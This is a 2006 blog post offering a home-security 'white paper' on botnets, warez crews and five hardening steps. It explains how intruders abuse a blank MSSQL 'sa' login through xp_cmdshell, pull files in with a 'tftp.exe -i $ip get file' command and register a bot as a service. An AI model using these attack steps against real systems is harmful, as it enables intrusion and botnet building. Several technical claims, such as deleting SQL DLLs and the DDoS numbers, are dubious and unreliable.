Saturday, January 21, 2006

Require Complex Passwords


This paper was written because of massive attacks agianst servers and
the construction of huge bot nets!
It is not a practical guidebook to any Operating System or to perfect
security on any Computer.

If you are an Administrator or any Computer owner you do NOT need to be
a security expert to get at least some
security on your home computers or big cluster systems!
There are 5 easy to follow steps that will help to prevent you from
getting hacked or becomeing one of thoose
remote controlled computers!

First off i am going to tell you a little bit about the fascinating
world of Botnets and other very unlikely things that
can happen to your Computers:

-)Getting hacked:
If you are watching out in some internet forums you will be very likely
to see thoose postings "i got hacked"
or "my box got hacked-what do i do now?" but did they really get
hacked? ....Well as far as i know only 3 out
of 10 boxed really got hacked the other ones are just infected with the
real bad stuff.
The main reasons of hacking have changed and in the real world there
are not many real Hackers left!
The real ones are living in the world of the byte and the electron
looking out for the perfect code and all the
knowledge they can gain! Most of the computers that are hacked
today...well they are NOT they just simply got
cracked. But why are people breaking into systems? There are a couple
of answers to this question, but only
one that is for real. Servers get most often cracked by a so called
"haxxor" , this stands out for a kiddy cracker
(in short script kiddys). Theese just hack theyr way into boxes for two
reasons:
-1) To just be "The ELITE HACKER" that can hack into his best friends
box or
-2) becacause they are part of a so called "Warez Crew".
If the box is hacked for a warez crew it is may running a trojan or
some sort of bot, but definatly a Ftp Deamon
! Theese hacked boxes are so called "Stro" or "Stroz" witch stands out
for a hacked box that is running an ftp deamon
(most used are: Servu, Gene 6, and some use glftp ports for windows)
after theese boxes are hacked and
running some ftp deamon the hacker is very likely to secure the bug
that allowed him to hack the box!
Afterwards the attacker submits an account on the ftp deamon to a so
called "Fillor" that fills the box with warez
in hidden directorys. This can cause massive ammounts of traffic on
hacked maschines (up to some terrabytes
on 100mbit+ servers) because then the complete crew shares the accounts
that have download only rights!

Bots,Botnets and other nasty stuff:
Well this is what will happen most often:
Some cracker writes some worm to spread his bots or if he is skilled
enouph he adds a scan engine to the bot.
Bots, Viruses and Worms spread in nearly the same way skript kiddys
hack boxes to store theyr warez.
If a new public Exploit is released or if the cracker finds a bug that
he is able to use he just takes that code
and writes a scan engine for it. What that means is quite simple: every
computer has an ip adress and a
number of ports (80 http, 21 ftp, ....telnet...tftp....) and most
services on a computer use a default port.
The engine just simply connects to that port and checks if it is open.
If it is the engine checks if the service is
running (i am now taking 1433 known as MS-SQL as my example). This is
the point where it gets tricky
most bugs that allow to execute code are not using any passwords but it
can happen that the service does
as mssql :-) If the service is able to use a password SET IT and CHANGE
THE USERNAME because this
makes it harder to guess the password by Brute force (trying random
combinations) or a dictionairy attack
(the attacker uses a word list with fixed up password combinations) if
the password is guessed you are
very close to be (filtered)! If in a warez crew a scan could look like
this(with standart mssql):
Found: [sa: ] on 127.0.0.1
now this tells the hacker or the bot that the computer with the ip
adress 127.0.0.1 (also known as localhost
(IMG:style_emoticons/default/tongue.gif))
has the username sa set wich stands out for the sql standart user
(sa=Set Administrator)
in this case the bot or haxxor connects to the target on port 1433
(mssql) and enters the username without a password. In regular cases it
or he would only be able to chance the pasword, or add some data to the
database
but this is for real and i am going to tell ya how it really works
since you need to know your enemy.
The attacker uses an exploit that allows him to do certain prozedure
calls or to execute code (in case of mssql its a call) If a kiddy would
hack sql the standart method of doing so is to call the prozedure
XP-CMDSHELL
this is a build in feature of mssql that allows to get shell exess
(full acess to CMD also known as MS dos )
now he just uploads his stuff thru the useage of ftp.exe (by the usage
of a script) or by tftp (tftp.exe -i $ip get file )
but there are other interesting ways to upload programms onto boxes
(rcp,debug.exe, inline transfer, iexplore )
After the ftp deamon or bot has been uploaded it just adds itself to
the service list (see it thru net start in cmd)
this is done by c:/file/bad.exe -i then the attacker starts the
programm by "net start servicename"
and the bot or ftp deamon is running. in both cases the attacker or the
bot will secure the security hole it
used to get into the system! (in sql you should delete the following
dlls: xpstar.dll, odsole70.dll, xpsql60.dll, xpsql70.dl, Xplog70.dll
-To create a so called SQL error this error only effects the exploit
not your database)
Most kiddys can not hack theese boxes anymore but some skilled ones or
the real hacker can ...
you see security is just an illuison! there are thousends of bugs like
the one in sql in too many to thell ya know
but if you stick to the following information it will help you to
prevent getting hacked or a bot.
So called bots if they are running on your system will connect to irc
to any server and join a channel where they
get theyr commands (ip ranges that need to be scanned and targets for
DDos attacks)
A botnet that can do a sucessfull ddos need to have minimum of 5 fast
boxes or 100000000000 of slower ones!

After you have read the information about theese little pests and
kiddys i am going to help ya a little bit on your security!
First off: the 5 basics:
-1) Require Complex Passwords
-2) Firewall and Antivirus
-3)Ubdates&Userrights
-4)Acess logging tools,Brute Force Detection tools
-5)Backups

I am going to take you step by step and tell ya what it is all about so
read this carefully
1.) by useing random generated passwords you may not be able to
remember them that easy that you used to
but it will preventy you from getting hacked thru passord guessing or
dictionary attacks!
Still you will need to have a different password for every account and
service because if one of them get guessed
the attacker would automatically have all of your passwords!
!!!!!DO NEVER SHARE OR TELL ANY OF YOUR PASSWORDS!!!!!!
2.) Please make shure to install at least a good firewall and only ONE
antivirus that you keep ubdated!
If you are running multiple antivirus programms they will be scanning
each other slowing your system down and
eating up memory until your box dies, but you will need to keep them
ubdated!
3.)A point that most people do not think about but that i really want
to get your attantion at is the one with the
USERRIGHTS! Ok i know its hard to set them on XP boxes but if you are
logged in with an adminsistrator account
the attacker will have theese rights automatically but if you only have
small perfectly fit userrights the attacker
will have a much harder time if trying to get your computer hacked. If
there are any ubdates or paches please use
them but do not let them be done automatically! Do them by HAND.
Another very important point of Security
is to install only services that are needed and to uninstall the ones
that are not needed (if there are only a few
services there are only a few bugs possible) for example nearly
everybody has installed netbios and $shares
but nobody knows what they do and nearly nobody uses them exept for
attackers!
4)Acess logging tools and Network sniffers are not tools to prevent you
from getting hacked but to help you to find
out who hacked you and what he did this is important to server
administrators! Another Great way is the usage of so called
"Brute-Force-Detection-Systems" and Attack detection Tools!
5)Backups : Everybody should do backups of his local hard drives to get
this accomplished as easy as possible
you should devide your harddrives into the following partitons: c:/
(windows, 6 gigabyte) d:/ (programms 15 gig)
and filally e:/ (Workspace... as big as possible)
If you wanna be very good you should only backup your workspace
partition! Ok this is strange but i am going to
tell ya even why! because this partiton does not contain eny
executables (exe files) it is very small so you can get
a backup mostly on some cds and dvds! to save even space you can
compress it useing winrar before burning
any backup cds/dvds! DO not store any backups on your hard drives
because the attacker could be able to infect
them this is why you SHALL NOT use any windows services for doing
backups! Use external applications and
build a custom install disk for your windows! this allows you to have
all programms ready when you need to do
a reintallation and your documents are on a seperate backup disk!

Theese are just a few easy steps to secure any system and a little cute
white paper for ya!
I really hope you enjoy.

Greets

N@xXaTo3

Things to know
I wanteed to add this section coz this paper might lead to some
"missunderstandings"
a)I dont care that much about hacking sql but i thought it might be a
good example to take it for
demonstration purposes!
b)even if a system is secured and its running mssql it can be hacked by
useage of other valuerbitlitys
for example if the dlls are reuploded by the usage of net shares
c)Never change a running system! ...is good but there is one exeption
ubdates!
d)This is not a tutorial to hack but it can be seen as a white paper
that shows some of the worst
things that can happen to your Computers
e)If you think Your COMPUTER might be hacked then u should use system
information tools
including highjack this and all the other great ones avible from the
net to create a "REPORT"
that includes as many details as possible so that your friends and
helpers can find the problm
quicker without asking too many questions!
f)why did i post it at GSO-well since i see hacked computers every day
and i am really getting anyed
in my free time i am taking botnets from schools and even HOSPITALS
down and
after i get the little pests off i will patch them if they cannot be
reset!
By now it really pisses me off htat everybody needs to have a botnet to
be that "cool" !
You will see many posts in the future in sections as "discovered
malware" and stuff coz i find almost
a new xdcc botkit everyday! that is something that will have to change

but how do they say?-------ONLY TIME CAN TELL

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.